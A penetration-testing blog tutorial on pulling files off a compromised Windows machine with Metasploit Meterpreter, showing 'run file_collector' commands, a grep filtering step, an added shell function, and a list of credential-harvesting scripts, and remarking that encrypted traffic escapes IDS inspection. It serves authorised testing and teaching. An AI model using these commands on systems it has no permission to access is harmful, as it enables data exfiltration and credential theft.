Msfconsole Upload and Download Files to Compromised Computer
Imagine you have compromised a target system as part of a penetration test. Additionally, as part of the pen-test you need to download some files, both as proof of the compromise, and also to use the collected data from this system to help in further exploitation of other systems.
Here I discuss options for how files can be downloaded using the Metasploit Meterpreter console, and using Meterpreter scripts to speed up the process.
I must emphasize that these techniques should only be used for legitimate purposes, either on a test network, or for penetration testing where you have written permission from the data owner.
You are responsible for your actions, make sure that everything you do is ethical, and use these techniques for good purposes.
We will skip the exploitation stage in these examples, to focus on the post-exploitation and data collection aspects.
So, we have exploited a system, and find ourselves at a friendly Meterpreter console prompt.
The Meterpreter shell has a lot of great features, including encryption of all the traffic between our attacking system and the target. This prevents interception and inspection of the data by intrusion detection systems (IDS).
Downloading individual files:
From the Meterpreter console it is possible to download individual files using the "download" command, which is pretty straightforward and easy if you only want to download one file.
Meterpreter has a lot of useful inbuilt scripts to make post-exploitation tasks such as information collection easier. To view the options, just type "run" and then space-tab-tab
Let's look at "run file_collector" first:
In the example below, I wanted to copy all the data from the E: drive of a Windows target, with the exception of a couple of directories that I am not interested in.
(In this actual example I am copying some files from a "Teach yourself C for Linux in 21 days" CD which is in the drive on the target system, onto my attacking system ;o)
To view the "run file_collector" options, use "-h"
meterpreter > run file_collector -h
Meterpreter Script for searching and downloading files that
match a specific pattern. First save files to a file, edit and
use that same file to download the chosen files.
OPTIONS:
-d
-f
-h Help menu.
-i
-l
-o
-r Search subdirectories.
meterpreter >
As you can see in the description, this is a three stage process. First, we create a file list, then we remove any files we don't want from the list, then we execute the download process.
Creating the file list
run file_collector -r -d e:\\ -f * -o /root/Courses/CforLinux/file.txt
We are running the collector recursively, looking for all files on the E: drive, and storing a list of these files in a "file.txt" file on my attacking system.
As Meterpreter copies files over an encrypted connection, this can make the data transfer slower, so it is best to strip out any unneeded files.
I don't need some of the directories on the target data drive, so I use grep to remove these, and make a new file "file.lst".
grep -v '\\DDD' /root/Courses/CforLinux/file.txt | grep -v '\\GCC' | grep -v '\\GDB' | grep -v '\\MAKE' > /root/Courses/CforLinux/file.lst
(I am removing the \DDD \GCC \GDB \MAKE directories, which is not especially relevant to you, just an example. I am killing two birds with one stone here, as this was useful to me at the time ;o)
Once we have the edited file list we can simply start the file download process with the following command:
run file_collector -i /root/Courses/CforLinux/file.lst -l /root/Courses/CforLinux/
There we go, and that was a very quick way to download all the files I needed.
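As an added example (not part of the original post), here is the grep filtering step written as a small shell function that you can reuse with any exclusion list before running the download stage. It assumes the list format file_collector writes, one full Windows path per line, and every sample path below is constructed. It matches the excluded names as whole directory components (the fixed string "\NAME\"), so an unrelated file that merely has "DDD" in its name is kept, which a bare grep for DDD would not do.

```sh
#!/bin/sh
# Added example, not from the original post: filter a file_collector list before
# the download stage. Assumes the list format the script produces, one full
# Windows path per line (e.g. e:\DDD\readme.txt); every path below is constructed.

# filter_file_list IN OUT NAME...
# Writes to OUT every line of IN that does not pass through a directory called
# NAME, and prints the number of lines kept.
filter_file_list() {
    in="$1"; out="$2"; shift 2
    excl="$(mktemp)"
    # Each excluded name becomes the fixed string "\NAME\", so only a directory
    # component matches; a file merely named DDD_notes.txt is kept.
    for d in "$@"; do
        printf '\\%s\\\n' "$d"
    done > "$excl"
    # -F fixed strings (no regex escaping of backslashes), -f patterns from file,
    # -v keep the non-matching lines. grep exits 1 when nothing survives, which
    # is a valid (empty) result here, hence the || true.
    grep -v -F -f "$excl" "$in" > "$out" || true
    rm -f "$excl"
    wc -l < "$out" | tr -d ' '
}

# Constructed sample list, standing in for file.txt from "run file_collector -o".
SAMPLE_LIST="$(mktemp)"
cat > "$SAMPLE_LIST" <<'EOF'
e:\DDD\readme.txt
e:\GCC\bin\gcc.exe
e:\SOURCE\ch01\hello.c
e:\SOURCE\ch02\DDD_notes.txt
e:\MAKE\make.exe
EOF

KEPT_LIST="$(mktemp)"
kept=$(filter_file_list "$SAMPLE_LIST" "$KEPT_LIST" DDD GCC GDB MAKE)
echo "kept $kept of $(wc -l < "$SAMPLE_LIST" | tr -d ' ') entries:"
cat "$KEPT_LIST"
```

Run it as-is to see the two surviving paths; for real use, point it at the file.txt produced by the collector and pass the resulting list to "run file_collector -i".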
Other scripts for data collection
There are a whole host of data collection scripts that you can try, including the following:
scraper, credcollect, get_filezilla_creds, dumplinks, get_pidgin_creds, enum_chrome, enum_firefox, enum_putty, winenum
...and if you are feeling adventurous you could create your own scripts. (Maybe a blog for another time)
Mitigations
- There aren't really any mitigations for these examples. If the exploitation has got this far, it is basically game over.
- Deploying a layered security program, using "Defense in depth", can reduce the risk of the initial exploitation.
Source: http://insidetrust.blogspot.com/2010/10/post-exploitation-downloading-files.html